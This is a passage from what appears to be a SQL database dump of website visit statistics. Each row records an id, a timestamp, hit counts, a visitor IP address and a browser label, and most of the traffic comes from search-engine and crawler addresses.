1517314633,1,1,0,0,'54.36.148.152','other'),(203969,1517314634,1,1,0,0,'54.36.149.16','other'),(203970,1517314749,1,1,0,0,'54.36.149.61','other'),(203971,1517314849,1,1,0,0,'54.36.149.65','other'),(203972,1517314862,1,1,0,0,'91.196.178.92','chrome'),(203973,1517314896,1,1,0,0,'54.36.148.235','other'),(203974,1517315186,6,6,0,0,'216.244.66.246','other'),(203975,1517315433,1,0,1,0,'66.249.64.67',''),(203976,1517315450,1,1,0,0,'54.36.148.49','other'),(203977,1517315451,1,1,0,0,'51.255.71.117','other'),(203978,1517315520,1,1,0,0,'85.115.62.180','other'),(203979,1517315740,1,1,0,0,'54.36.148.63','other'),(203980,1517315771,1,1,0,0,'54.36.148.11','other'),(203981,1517315798,1,1,0,0,'54.36.149.53','other'),(203982,1517315851,1,1,0,0,'37.9.113.182','other'),(203983,1517315928,1,1,0,0,'54.36.149.7','other'),(203984,1517315934,1,0,1,0,'66.249.64.71',''),(203985,1517316007,1,1,0,0,'91.196.178.97','chrome'),(203986,1517316223,1,1,0,0,'54.36.148.167','other'),(203987,1517316225,1,1,0,0,'54.36.149.82','other'),(203988,1517316229,1,1,0,0,'54.36.148.123','other'),(203989,1517316255,1,1,0,0,'54.36.148.119','other'),(203990,1517316459,1,1,0,0,'54.36.148.177','other'),(203991,1517316513,5,5,0,0,'216.244.66.194','other'),(203992,1517316560,1,1,0,0,'54.36.149.56','other'),(203993,1517316932,1,1,0,0,'54.36.148.105','other'),(203994,1517317094,1,1,0,0,'54.36.149.58','other'),(203995,1517317181,1,1,0,0,'91.196.178.67','firefox'),(203996,1517317560,1,1,0,0,'54.36.148.191','other'),(203997,1517317591,1,0,1,0,'66.249.64.71',''),(203998,1517317751,1,1,0,0,'35.153.67.216','other'),(203999,1517317771,1,1,0,0,'77.111.244.18','chrome'),(204000,1517318564,1,1,0,0,'91.196.178.163','chrome'),(204001,1517319053,1,1,0,0,'176.109.173.174','chrome'),(204002,1517319292,1,1,0,0,'51.255.71.125','other'),(204003,1517319581,1,1,0,0,'91.196.178.67','firefox'),(204004,1517319879,1,1,0,0,'54.36.149.6','other'),(204005,1517319914,1,1,0,0,'54.36.149.41','other'),(204006,1517319955,1,1,0,0,'54.36.148.79','other'),(204007,1517320015,1,1,0,0,'54.36.149.4','other'),(204008,1517320078,5,5,0,0,'216.244.66.246','other'),(204009,1517320211,2,2,0,0,'54.36.148.159','other'),(204010,1517320311,1,1,0,0,'185.41.23.186','chrome'),(204011,1517320336,1,1,0,0,'54.36.149.99','other'),(204012,1517320353,1,1,0,0,'92.113.94.129','chrome'),(204013,1517320494,1,1,0,0,'91.196.178.97','chrome'),(204014,1517320689,1,1,0,0,'54.36.148.232','other'),(204015,1517320786,1,1,0,0,'54.36.148.203','other'),(204016,1517320789,1,1,0,0,'54.36.148.16','other'),(204017,1517320934,1,1,0,0,'54.36.149.37','other'),(204018,1517321016,1,1,0,0,'54.36.148.50','other'),(204019,1517321019,1,1,0,0,'54.36.148.49','other'),(204020,1517321070,1,1,0,0,'91.196.178.163','chrome'),(204021,1517321077,1,1,0,0,'54.36.148.45','other'),(204022,1517321243,1,1,0,0,'54.36.148.73','other'),(204023,1517321372,1,1,0,0,'91.196.178.166','chrome'),(204024,1517321378,1,1,0,0,'95.135.60.192','firefox'),(204025,1517321513,1,1,0,0,'54.36.148.240','other'),(204026,1517321596,1,1,0,0,'40.77.167.109','other'),(204027,1517321916,1,1,0,0,'54.36.148.10','other'),(204028,1517322304,1,1,0,0,'91.196.177.134','chrome'),(204029,1517322607,1,1,0,0,'54.36.149.5','other'),(204030,1517322631,1,1,0,0,'188.130.176.3','chrome'),(204031,1517322682,1,1,0,0,'91.196.179.61','chrome'),(204032,1517322684,1,1,0,0,'87.250.224.77','other'),(204033,1517322771,1,1,0,0,'54.36.148.246','other'),(204034,1517322857,2,2,0,0,'54.36.148.15','other'),(204035,1517322867,1,1,0,0,'66.249.64.15','chrome'),(204036,1517322962,1,1,0,0,'54.36.148.208','other'),(204037,1517322984,1,0,1,0,'66.249.64.71',''),(204038,1517323016,1,1,0,0,'8.29.198.26','other'),(204039,1517323140,1,1,0,0,'91.196.178.92','chrome'),(204040,1517323515,1,1,0,0,'37.73.220.145','chrome'),(204041,1517323518,2,2,0,0,'91.196.178.67','chrome'),(204042,1517323601,1,1,0,0,'54.36.148.102','other'),(204043,1517323706,1,1,0,0,'91.196.178.163','chrome'),(204044,1517323989,2,2,0,0,'54.36.149.46','other'),(204045,1517324063,1,1,0,0,'54.36.148.41','other'),(204046,1517324083,1,1,0,0,'54.36.149.16','other'),(204047,1517324118,1,1,0,0,'91.196.178.92','chrome'),(204048,1517324154,1,1,0,0,'141.8.142.74','other'),(204049,1517324268,2,2,0,0,'216.244.66.194','other'),(204050,1517324272,1,1,0,0,'216.244.66.246','other'),(204051,1517324340,1,1,0,0,'35.153.67.216','other'),(204052,1517324373,1,1,0,0,'54.36.148.21','other'),(204053,1517324414,1,1,0,0,'54.36.148.249','other'),(204054,1517324533,1,1,0,0,'91.196.178.67','chrome'),(204055,1517324547,1,1,0,0,'54.36.148.177','other'),(204056,1517324566,1,1,0,0,'54.36.148.156','other'),(204057,1517324602,1,1,0,0,'91.196.179.61','chrome'),(204058,1517324766,1,1,0,0,'37.204.181.202','chrome'),(204059,1517324805,2,2,0,0,'95.134.229.248','chrome'),(204060,1517324904,1,1,0,0,'54.36.149.74','other'),(204061,1517325327,1,1,0,0,'54.36.149.73','other'),(204062,1517325329,1,1,0,0,'54.36.149.61','other'),(204063,1517325382,1,1,0,0,'54.36.148.187','other'),(204064,1517325401,1,1,0,0,'54.36.149.53','other'),(204065,1517325459,1,1,0,0,'178.154.171.88','other'),(204066,1517325937,1,1,0,0,'54.36.148.88','other'),(204067,1517325980,1,1,0,0,'40.77.167.109','other'),(204068,1517326229,1,1,0,0,'54.36.148.177','other'),(204069,1517326295,1,1,0,0,'188.230.43.254','other'),(204070,1517326402,1,1,0,0,'54.36.148.75','other'),(204071,1517326438,1,1,0,0,'40.77.167.84','other'),(204072,1517326514,1,1,0,0,'217.69.133.4','other'),(204073,1517326675,1,1,0,0,'217.69.133.194','other'),(204074,1517326693,1,1,0,0,'54.36.148.123','other'),(204075,1517327177,3,3,0,0,'216.244.66.194','other'),(204076,1517327488,1,1,0,0,'54.36.148.99','other'),(204077,1517327745,1,1,0,0,'54.36.149.33','other'),(204078,1517327746,1,1,0,0,'54.36.148.157','other'),(204079,1517327758,1,1,0,0,'54.36.148.54','other'),(204080,1517327799,1,1,0,0,'91.209.11.236','other'),(204081,1517328104,1,1,0,0,'54.36.148.246','other'),(204082,1517328400,1,1,0,0,'54.36.148.229','other'),(204083,1517328555,1,1,0,0,'40.77.167.84','other'),(204084,1517328691,1,1,0,0,'188.230.43.254','other'),(204085,1517328731,1,1,0,0,'54.36.149.20','other'),(204086,1517328747,1,1,0,0,'54.36.148.115','other'),(204087,1517329028,1,0,1,0,'68.180.229.52',''),(204088,1517329035,1,1,0,0,'54.36.148.85','other'),(204089,1517329194,1,1,0,0,'54.36.149.3','other'),(204090,1517329400,1,1,0,0,'54.36.149.98','other'),(204091,1517329423,1,1,0,0,'91.196.178.76','chrome'),(204092,1517329429,1,1,0,0,'178.92.152.149','chrome'),(204093,1517329463,1,1,0,0,'54.36.148.138','other'),(204094,1517329606,1,1,0,0,'54.36.148.167','other'),(204095,1517329657,1,1,0,0,'54.36.148.93','other'),(204096,1517329690,1,1,0,0,'54.36.148.72','other'),(204097,1517329759,1,1,0,0,'217.69.133.226','other'),(204098,1517329902,1,1,0,0,'107.167.105.21','other'),(204099,1517329940,1,1,0,0,'54.36.148.201','other'),(204100,1517330078,1,1,0,0,'54.36.148.57','other'),(204101,1517330163,1,0,1,0,'66.249.64.67',''),(204102,1517330309,1,1,0,0,'54.36.148.33','other'),(204103,1517330440,1,1,0,0,'91.209.11.236','other'),(204104,1517330443,1,1,0,0,'54.36.148.15','other'),(204105,1517330632,1,1,0,0,'54.36.148.196','other'),(204106,1517330652,5,5,0,0,'216.244.66.246','other'),(204107,1517330722,1,1,0,0,'66.249.64.73','chrome'),(204108,1517330931,1,1,0,0,'141.8.142.74','other'),(204109,1517331013,1,1,0,0,'54.36.149.37','other'),(204110,1517331142,1,1,0,0,'54.36.148.73','other'),(204111,1517331143,1,1,0,0,'207.46.13.181','other'),(204112,1517331147,1,1,0,0,'54.36.149.9','other'),(204113,1517331213,1,1,0,0,'77.111.245.13','chrome'),(204114,1517331691,1,1,0,0,'188.230.43.254','other'),(204115,1517331723,1,1,0,0,'91.196.178.16','chrome'),(204116,1517331763,1,1,0,0,'91.196.178.16','other'),(204117,1517331988,1,1,0,0,'54.36.148.169','other'),(204118,1517332179,1,1,0,0,'54.36.148.163','other'),(204119,1517332208,1,1,0,0,'91.196.178.81','firefox'),(204120,1517332211,1,1,0,0,'109.86.17.153','chrome'),(204121,1517332364,1,1,0,0,'141.8.142.74','other'),(204122,1517332614,1,1,0,0,'35.153.67.216','other'),(204123,1517332781,1,1,0,0,'54.36.148.172','other'),(204124,1517332854,1,0,1,0,'66.249.64.71',''),(204125,1517332920,1,1,0,0,'37.53.230.63','chrome'),(204126,1517333422,1,1,0,0,'87.76.242.126','chrome'),(204127,1517333467,1,1,0,0,'95.221.255.59','msie'),(204128,1517333631,1,1,0,0,'54.36.149.3','other'),(204129,1517333713,1,1,0,0,'54.36.149.50','other'),(204130,1517333757,3,3,0,0,'216.244.66.246','other'),(204131,1517333772,1,0,1,0,'66.249.64.67',''),(204132,1517333843,1,1,0,0,'8.29.198.26','other'),(204133,1517333869,1,1,0,0,'54.36.148.15','other'),(204134,1517333898,1,1,0,0,'54.36.148.238','other'),(204135,1517334137,1,1,0,0,'54.36.149.82','other'),(204136,1517334288,2,2,0,0,'216.244.66.194','other'),(204137,1517334317,1,1,0,0,'54.36.148.80','other'),(204138,1517334432,1,1,0,0,'54.36.148.135','other'),(204139,1517334447,1,1,0,0,'51.255.71.132','other'),(204140,1517334555,1,1,0,0,'54.36.148.79','other'),(204141,1517334630,1,1,0,0,'54.36.149.103','other'),(204142,1517335262,1,1,0,0,'54.36.148.196','other'),(204143,1517335367,1,1,0,0,'54.36.149.31','other'),(204144,1517335390,1,1,0,0,'54.36.148.254','other'),(204145,1517335485,1,1,0,0,'54.36.148.249','other'),(204146,1517335603,1,1,0,0,'54.36.149.81','other'),(204147,1517335619,1,1,0,0,'35.153.67.216','other'),(204148,1517335716,1,1,0,0,'91.196.178.49','chrome'),(204149,1517335789,1,1,0,0,'54.36.149.76','other'),(204150,1517335830,1,1,0,0,'137.74.203.194','other'),(204151,1517336033,1,1,0,0,'54.36.148.186','other'),(204152,1517336097,1,1,0,0,'164.132.162.158','other'),(204153,1517336283,1,0,1,0,'66.249.64.71',''),(204154,1517336304,3,3,0,0,'216.244.66.194','other'),(204155,1517336900,1,1,0,0,'51.255.71.118','other'),(204156,1517336964,1,1,0,0,'54.36.149.25','other'),(204157,1517338000,1,1,0,0,'95.132.134.206','chrome'),(204158,1517338706,1,1,0,0,'54.36.148.59','other'),(204159,1517339028,1,1,0,0,'35.153.67.216','other'),(204160,1517339174,1,1,0,0,'37.9.113.157','other'),(204161,1517339190,1,0,1,0,'66.249.64.67',''),(204162,1517339271,1,1,0,0,'54.36.149.41','other'),(204163,1517339354,1,1,0,0,'54.36.149.91','other'),(204164,1517340379,1,1,0,0,'54.36.149.14','other'),(204165,1517340569,1,1,0,0,'37.9.113.138','other'),(204166,1517340850,1,1,0,0,'91.196.178.163','chrome'),(204167,1517340983,1,1,0,0,'54.36.149.81','other'),(204168,1517341099,5,5,0,0,'216.244.66.246','other'),(204169,1517341808,1,1,0,0,'54.36.149.14','other'),(204170,1517342166,1,0,1,0,'66.249.64.67',''),(204171,1517342208,1,0,1,0,'66.249.64.14',''),(204172,1517342379,1,1,0,0,'51.255.71.110','other'),(204173,1517342476,1,1,0,0,'54.36.149.59','other'),(204174,1517342613,1,1,0,0,'137.74.203.194','other'),(204175,1517342625,1,1,0,0,'51.255.71.119','other'),(204176,1517342826,1,1,0,0,'64.13.139.226','firefox'),(204177,1517343323,1,1,0,0,'54.36.149.25','other'),(204178,1517344146,2,2,0,0,'216.244.66.246','other'),(204179,1517344676,1,1,0,0,'8.29.198.25','other'),(204180,1517345166,1,1,0,0,'51.255.71.121','other'),(204181,1517345206,1,1,0,0,'54.36.149.8','other'),(204182,1517346295,1,1,0,0,'51.255.71.110','other'),(204183,1517346721,1,1,0,0,'54.36.149.52','other'),(204184,1517346890,3,3,0,0,'216.244.66.194','other'),(204185,1517347043,1,1,0,0,'54.36.148.70','other'),(204186,1517347054,2,2,0,0,'178.154.171.88','other'),(204187,1517347573,1,1,0,0,'54.36.149.8','other'),(204188,1517347607,1,0,1,0,'66.249.64.67',''),(204189,1517347918,1,1,0,0,'87.250.224.46','other'),(204190,1517348193,1,1,0,0,'54.36.149.97','other'),(204191,1517348312,1,1,0,0,'91.196.178.167','chrome'),(204192,1517348877,1,1,0,0,'54.36.149.104','other'),(204193,1517349249,1,1,0,0,'54.36.148.244','other'),(204194,1517349328,1,1,0,0,'54.36.148.63','other'),(204195,1517349542,1,1,0,0,'51.255.71.123','other'),(204196,1517349546,1,1,0,0,'35.153.67.216','other'),(204197,1517349646,1,1,0,0,'54.36.148.102','other'),(204198,1517349725,1,1,0,0,'141.8.142.74','other'),(204199,1517349729,1,1,0,0,'54.36.149.97','other'),(204200,1517349900,1,1,0,0,'37.9.113.182','other'),(204201,1517349954,1,1,0,0,'54.36.149.52','other'),(204202,1517350252,1,1,0,0,'37.9.113.114','other'),(204203,1517350328,1,1,0,0,'54.36.149.61','other'),(204204,1517350411,1,1,0,0,'66.249.64.14','chrome'),(204205,1517350438,1,0,1,0,'66.249.64.71',''),(204206,1517350814,1,1,0,0,'54.36.148.192','other'),(204207,1517351481,1,1,0,0,'51.255.71.114','other'),(204208,1517351514,1,1,0,0,'54.36.149.97','other'),(204209,1517351582,1,1,0,0,'54.36.148.250','other'),(204210,1517351709,1,1,0,0,'54.36.149.18','other'),(204211,1517352660,1,1,0,0,'54.36.149.39','other'),(204212,1517353582,1,0,1,0,'66.249.64.73',''),(204213,1517353606,1,1,0,0,'51.255.71.113','other'),(204214,1517353628,1,1,0,0,'51.255.71.114','other'),(204215,1517353646,1,1,0,0,'157.55.39.170','other'),(204216,1517353800,1,1,0,0,'51.255.71.122','other'),(204217,1517353803,1,1,0,0,'54.36.149.4','other'),(204218,1517353972,1,1,0,0,'178.154.171.88','other'),(204219,1517354252,4,4,0,0,'216.244.66.194','other'),(204220,1517354795,1,0,1,0,'66.249.64.71',''),(204221,1517354828,1,1,0,0,'66.249.64.71','chrome'),(204222,1517355297,4,4,0,0,'216.244.66.246','other'),(204223,1517355509,1,1,0,0,'8.29.198.27','other'),(204224,1517355806,1,1,0,0,'54.36.148.16','other'),(204225,1517356556,1,1,0,0,'51.255.71.120','other'),(204226,1517356812,1,1,0,0,'54.36.148.192','other'),(204227,1517357177,1,1,0,0,'54.36.148.172','other'),(204228,1517357212,1,1,0,0,'141.8.142.74','other'),(204229,1517357377,4,4,0,0,'216.244.66.194','other'),(204230,1517357476,1,1,0,0,'137.74.207.108','other'),(204231,1517357588,1,1,0,0,'40.77.167.30','other'),(204232,1517357714,1,1,0,0,'54.36.148.253','other'),(204233,1517357976,1,1,0,0,'54.36.148.231','other'),(204234,1517358114,1,1,0,0,'54.36.148.17','other'),(204235,1517358208,1,1,0,0,'66.249.64.73','chrome'),(204236,1517358637,1,1,0,0,'54.36.149.4','other'),(204237,1517358804,2,2,0,0,'141.8.142.74','other'),(204238,1517358931,1,1,0,0,'54.36.148.132','other'),(204239,1517359437,1,1,0,0,'54.36.149.41','other'),(204240,1517359845,1,1,0,0,'54.36.149.18','other'),(204241,1517360051,1,1,0,0,'35.153.67.216','other'),(204242,1517360205,1,0,1,0,'66.249.64.71',''),(204243,1517360734,1,1,0,0,'188.255.67.77','msie'),(204244,1517360774,1,1,0,0,'216.244.66.246','other'),(204245,1517360968,1,1,0,0,'35.153.67.216','other'),(204246,1517361179,1,1,0,0,'51.255.71.119','other'),(204247,1517361363,1,0,1,0,'66.249.64.67',''),(204248,1517361599,1,1,0,0,'54.36.149.87','other'),(204249,1517361844,2,2,0,0,'54.36.148.178','other'),(204250,1517361891,2,2,0,0,'54.36.149.76','other'),(204251,1517362145,1,1,0,0,'35.153.67.216','other'),(204252,1517362863,1,1,0,0,'157.55.39.170','other'),(204253,1517363132,1,1,0,0,'167.160.113.45','msie'),(204254,1517363748,1,1,0,0,'216.244.66.194','other'),(204255,1517364347,1,1,0,0,'141.8.142.74','other'),(204256,1517364522,1,1,0,0,'54.36.148.112','other'),(204257,1517364803,1,0,1,0,'66.249.64.14',''),(204258,1517365224,1,1,0,0,'217.69.134.175','other'),(204259,1517365236,1,1,0,0,'217.69.134.161','other'),(204260,1517365249,1,1,0,0,'217.69.133.3','other'),(204261,1517365264,1,1,0,0,'217.69.133.6','other'),(204262,1517365282,1,1,0,0,'217.69.134.188','other'),(204263,1517365539,1,1,0,0,'137.74.207.102','other'),(204264,1517365663,1,1,0,0,'216.244.66.246','other'),(204265,1517365696,1,1,0,0,'51.255.71.121','other'),(204266,1517365836,1,0,1,0,'66.249.64.67',''),(204267,1517366151,1,1,0,0,'40.77.167.30','other'),(204268,1517366334,1,1,0,0,'8.29.198.26','other'),(204269,1517366499,1,1,0,0,'141.8.142.74','other'),(204270,1517366717,1,1,0,0,'54.36.149.80','other'),(204271,1517366864,1,0,1,0,'66.249.64.15',''),(204272,1517367528,1,1,0,0,'54.36.149.90','other'),(204273,1517367830,1,1,0,0,'51.255.71.120','other'),(204274,1517368338,1,1,0,0,'35.153.67.216','other'),(204275,1517368631,1,1,0,0,'54.36.148.205','other'),(204276,1517368819,1,1,0,0,'54.36.149.84','other'),(204277,1517368949,1,1,0,0,'87.250.224.46','other'),(204278,1517369139,1,1,0,0,'54.36.148.206','other'),(204279,1517369766,1,1,0,0,'51.255.71.128','other'),(204280,1517370010,5,5,0,0,'216.244.66.246','other'),(204281,1517370042,2,2,0,0,'141.8.142.74','other'),(204282,1517370244,1,1,0,0,'66.249.64.15','chrome'),(204283,1517370316,1,0,1,0,'66.249.64.67',''),(204284,1517370411,1,1,0,0,'54.36.148.198','other'),(204285,1517370708,1,1,0,0,'178.154.171.88','other'),(204286,1517371316,1,1,0,0,'54.36.148.205','other'),(204287,1517371328,1,1,0,0,'40.77.167.30','other'),(204288,1517371496,1,1,0,0,'164.132.162.153','other'),(204289,1517371717,2,2,0,0,'77.111.244.21','chrome'),(204290,1517372231,1,1,0,0,'54.36.148.198','other'),(204291,1517373043,1,1,0,0,'54.36.149.43','other'),(204292,1517373050,1,1,0,0,'141.8.142.74','other'),(204293,1517373894,1,1,0,0,'54.36.149.3','other'),(204294,1517374036,1,1,0,0,'54.36.148.63','other'),(204295,1517374176,3,3,0,0,'216.244.66.194','other'),(204296,1517374388,1,1,0,0,'40.77.167.36','other'),(204297,1517374700,1,1,0,0,'54.36.149.78','other'),(204298,1517374829,1,1,0,0,'78.111.187.229','firefox'),(204299,1517375365,1,1,0,0,'51.255.71.113','other'),(204300,1517375614,1,1,0,0,'54.36.149.46','other'),(204301,1517375918,1,1,0,0,'141.8.142.74','other'),(204302,1517376378,2,2,0,0,'216.244.66.246','other'),(204303,1517377170,1,1,0,0,'8.29.198.27','other'),(204304,1517377616,1,0,1,0,'66.249.64.73',''),(204305,1517377626,1,1,0,0,'91.209.11.236','other'),(204306,1517377743,1,1,0,0,'37.9.113.182','other'),(204307,1517377915,1,1,0,0,'178.154.171.88','other'),(204308,1517378470,3,3,0,0,'216.244.66.194','other'),(204309,1517378602,1,1,0,0,'54.36.149.18','other'),(204310,1517379231,3,3,0,0,'216.244.66.246','other'),(204311,1517379288,1,1,0,0,'66.249.64.67','chrome'),(204312,1517379995,1,1,0,0,'54.36.149.86','other'),(204313,1517380312,1,1,0,0,'91.209.11.236','other'),(204314,1517380813,1,1,0,0,'91.196.178.69','chrome'),(204315,1517380866,1,1,0,0,'54.36.148.79','other'),(204316,1517381145,1,1,0,0,'54.36.148.170','other'),(204317,1517381317,1,1,0,0,'54.36.148.168','other'),(204318,1517381783,1,1,0,0,'54.165.59.7','other'),(204319,1517381907,1,1,0,0,'54.36.149.46','other'),(204320,1517382299,1,1,0,0,'178.154.171.88','other'),(204321,1517382303,1,1,0,0,'141.8.142.74','other'),(204322,1517382678,1,1,0,0,'91.196.178.99','chrome'),(204323,1517382770,1,0,1,0,'66.249.64.67',''),(204324,1517383105,1,1,0,0,'91.196.178.92','chrome'),(204325,1517383384,1,1,0,0,'82.207.91.234','other'),(204326,1517383472,1,1,0,0,'91.196.178.68','chrome'),(204327,1517383755,2,2,0,0,'178.154.171.88','other'),(204328,1517383762,1,1,0,0,'216.244.66.194','other'),(204329,1517383798,1,0,1,0,'66.249.64.67',''),(204330,1517383893,1,1,0,0,'54.36.149.21','other'),(204331,1517384382,1,1,0,0,'194.54.160.119','chrome'),(204332,1517384411,2,2,0,0,'141.8.142.74','other'),(204333,1517384448,1,1,0,0,'91.209.11.236','other'),(204334,1517384460,1,1,0,0,'54.36.148.112','other'),(204335,1517384484,2,2,0,0,'54.165.59.7','other'),(204336,1517385102,1,1,0,0,'95.134.202.149','firefox'),(204337,1517385501,1,1,0,0,'54.36.149.56','other'),(204338,1517385533,1,1,0,0,'195.230.119.34','chrome'),(204339,1517385619,1,1,0,0,'91.196.177.46','chrome'),(204340,1517385721,1,1,0,0,'91.196.178.68','firefox'),(204341,1517385841,1,1,0,0,'54.36.148.178','other'),(204342,1517385848,1,1,0,0,'54.36.148.43','other'),(204343,1517385974,1,1,0,0,'51.255.71.118','other'),(204344,1517386048,2,2,0,0,'141.8.142.74','other'),(204345,1517386248,1,1,0,0,'95.134.202.149','firefox'),(204346,1517386270,1,1,0,0,'207.46.13.143','other'),(204347,1517386276,1,1,0,0,'87.250.224.46','other'),(204348,1517386411,1,1,0,0,'138.197.147.135','chrome'),(204349,1517386414,1,1,0,0,'91.196.178.74','chrome'),(204350,1517386495,1,1,0,0,'164.132.164.180','other'),(204351,1517386540,2,2,0,0,'54.36.148.109','other'),(204352,1517386576,1,1,0,0,'130.180.218.31','chrome'),(204353,1517386656,1,1,0,0,'95.132.27.248','firefox'),(204354,1517386659,2,2,0,0,'216.244.66.246','other'),(204355,1517387029,1,1,0,0,'54.36.148.172','other'),(204356,1517387063,1,1,0,0,'164.132.162.153','other'),(204357,1517387070,1,0,1,0,'66.249.64.13',''),(204358,1517387157,1,0,1,0,'66.249.64.14',''),(204359,1517387160,1,1,0,0,'54.36.149.84','other'),(204360,1517387220,1,1,0,0,'54.36.148.205','other'),(204361,1517387281,1,1,0,0,'178.154.171.88','other'),(204362,1517387372,1,0,1,0,'66.249.64.73',''),(204363,1517387596,1,1,0,0,'54.36.148.237','other'),(204364,1517387632,1,1,0,0,'130.180.217.38','chrome'),(204365,1517387691,1,1,0,0,'91.196.178.74','chrome'),(204366,1517387743,1,1,0,0,'46.174.163.134','chrome'),(204367,1517387813,1,1,0,0,'54.165.59.7','other'),(204368,1517388003,1,1,0,0,'8.29.198.25','other'),(204369,1517388305,5,5,0,0,'216.244.66.194','other'),(204370,1517388493,1,1,0,0,'54.36.149.76','other'),(204371,1517388518,1,0,1,0,'66.249.64.67',''),(204372,1517389047,1,1,0,0,'54.36.149.93','other'),(204373,1517389140,2,2,0,0,'91.196.178.97','chrome'),(204374,1517389169,1,1,0,0,'51.255.71.101','other'),(204375,1517389902,3,3,0,0,'216.244.66.246','other'),(204376,1517390147,1,1,0,0,'91.196.178.135','firefox'),(204377,1517390350,1,1,0,0,'54.36.149.42','other'),(204378,1517390637,1,1,0,0,'46.174.163.134','chrome'),(204379,1517390651,1,1,0,0,'54.208.102.37','other'),(204380,1517390662,1,1,0,0,'54.165.59.7','other'),(204381,1517390829,1,1,0,0,'54.36.148.101','other'),(204382,1517390832,1,1,0,0,'54.36.149.40','other'),(204383,1517390918,1,1,0,0,'54.36.149.61','other'),(204384,1517390996,1,1,0,0,'91.209.11.236','other'),(204385,1517391000,1,1,0,0,'91.196.178.93','firefox'),(204386,1517391276,1,1,0,0,'91.196.178.74','chrome'),(204387,1517391849,1,1,0,0,'51.255.71.120','other'),(204388,1517392280,1,1,0,0,'91.196.178.74','chrome'),(204389,1517392384,1,1,0,0,'46.201.240.112','chrome'),(204390,1517392846,1,1,0,0,'91.196.178.168','chrome'),(204391,1517393390,1,1,0,0,'54.36.148.205','other'),(204392,1517393456,1,1,0,0,'51.255.71.132','other'),(204393,1517393520,1,1,0,0,'51.255.71.122','other'),(204394,1517393776,1,1,0,0,'141.8.142.74','other'),(204395,1517393877,1,1,0,0,'54.36.149.91','other'),(204396,1517393942,1,1,0,0,'180.76.15.156','other'),(204397,1517393989,1,1,0,0,'91.196.177.46','other'),(204398,1517394011,2,2,0,0,'216.244.66.194','other'),(204399,1517394482,1,1,0,0,'51.255.71.121','other'),(204400,1517394522,1,1,0,0,'51.255.71.98','other'),(204401,1517394854,1,1,0,0,'94.179.147.128','chrome'),(204402,1517394917,1,1,0,0,'51.255.71.126','other'),(204403,1517395018,1,1,0,0,'91.196.178.74','chrome'),(204404,1517395092,6,6,0,0,'91.196.177.46','other'),(204405,1517395120,1,1,0,0,'54.36.148.196','other'),(204406,1517395652,1,1,0,0,'91.196.177.134','chrome'),(204407,1517395766,2,2,0,0,'141.8.142.74','other'),(204408,1517396809,1,1,0,0,'54.165.59.7','other'),(204409,1517396924,1,1,0,0,'216.244.66.246','other'),(204410,1517397147,1,1,0,0,'141.8.142.74','other'),(204411,1517397242,1,1,0,0,'157.55.39.88','other'),(204412,1517397275,1,1,0,0,'51.255.71.131','other'),(204413,1517397397,1,1,0,0,'217.69.133.3','other'),(204414,1517397463,1,1,0,0,'217.69.134.182','other'),(204415,1517397512,1,1,0,0,'217.69.134.161','other'),(204416,1517397558,1,1,0,0,'151.80.27.116','other'),(204417,1517397844,1,1,0,0,'54.36.148.132','other'),(204418,1517398141,1,1,0,0,'54.36.149.46','other'),(204419,1517398265,1,1,0,0,'91.209.11.236','other'),(204420,1517398330,1,1,0,0,'217.69.133.226','other'),(204421,1517398440,1,1,0,0,'207.46.13.144','other'),(204422,1517398724,1,1,0,0,'95.132.122.193','chrome'),(204423,1517398833,4,4,0,0,'216.244.66.194','other'),(204424,1517398837,1,1,0,0,'8.29.198.27','other'),(204425,1517398948,1,1,0,0,'54.36.148.192','other'),(204426,1517398999,1,1,0,0,'37.54.33.55','chrome'),(204427,1517399346,1,1,0,0,'91.196.178.7','chrome'),(204428,1517399356,1,1,0,0,'54.36.149.56','other'),(204429,1517399548,1,0,1,0,'66.249.64.13',''),(204430,1517399586,1,1,0,0,'141.8.142.74','other'),(204431,1517400192,1,1,0,0,'54.36.148.202','other'),(204432,1517400403,1,1,0,0,'91.209.11.236','other'),(204433,1517400471,1,1,0,0,'46.164.131.98','chrome'),(204434,1517400612,1,1,0,0,'164.132.162.158','other'),(204435,1517400638,1,0,1,0,'66.249.64.67',''),(204436,1517400645,1,1,0,0,'66.249.64.71','chrome'),(204437,1517400649,1,1,0,0,'207.46.13.142','other'),(204438,1517401170,1,0,1,0,'66.249.64.73',''),(204439,1517401811,4,4,0,0,'216.244.66.246','other'),(204440,1517401862,1,1,0,0,'37.9.113.134','other'),(204441,1517401866,3,3,0,0,'141.8.142.74','other'),(204442,1517401888,19,19,0,0,'144.76.38.73','other'),(204443,1517401998,1,1,0,0,'37.9.113.157','other'),(204444,1517402286,1,1,0,0,'91.196.178.74','chrome'),(204445,1517402804,1,1,0,0,'54.36.149.65','other'),(204446,1517402916,1,1,0,0,'31.148.135.243','firefox'),(204447,1517402922,3,3,0,0,'141.8.142.74','other'),(204448,1517403345,1,1,0,0,'54.36.149.40','other'),(204449,1517403896,1,0,1,0,'66.249.64.71',''),(204450,1517403952,1,0,1,0,'66.249.64.73',''),(204451,1517404138,1,1,0,0,'51.255.71.125','other'),(204452,1517404227,1,1,0,0,'141.8.142.74','other'),(204453,1517404455,1,1,0,0,'207.46.13.144','other'),(204454,1517405384,1,1,0,0,'54.36.149.85','other'),(204455,1517405389,2,2,0,0,'141.8.142.74','other'),(204456,1517405621,1,1,0,0,'54.36.148.244','other'),(204457,1517405886,1,1,0,0,'178.154.171.88','other'),(204458,1517406061,1,1,0,0,'46.229.60.14','firefox'),(204459,1517406116,1,1,0,0,'54.36.148.205','other'),(204460,1517406137,1,1,0,0,'54.36.149.81','other'),(204461,1517406218,11,11,0,0,'37.57.218.243','other'),(204462,1517406415,1,1,0,0,'54.36.149.28','other'),(204463,1517406533,1,1,0,0,'91.196.178.68','chrome'),(204464,1517406634,3,3,0,0,'216.244.66.246','other'),(204465,1517406635,1,1,0,0,'51.255.71.115','other'),(204466,1517406694,2,2,0,0,'54.36.148.232','other'),(204467,1517406863,1,1,0,0,'51.255.71.119','other'),(204468,1517407891,1,1,0,0,'54.36.149.40','other'),(204469,1517408124,1,1,0,0,'87.250.224.85','other'),(204470,1517408327,1,1,0,0,'91.196.178.100','chrome'),(204471,1517408678,3,3,0,0,'216.244.66.194','other'),(204472,1517408701,2,2,0,0,'91.196.178.74','chrome'),(204473,1517409156,1,1,0,0,'91.196.178.136','chrome'),(204474,1517409673,1,1,0,0,'8.29.198.25','other'),(204475,1517409820,1,1,0,0,'37.9.113.110','other'),(204476,1517409862,1,1,0,0,'54.36.148.239','other'),(204477,1517410106,1,1,0,0,'94.179.84.42','chrome'),(204478,1517410264,1,1,0,0,'54.36.149.13','other'),(204479,1517410376,1,1,0,0,'91.196.178.74','chrome'),(204480,1517410486,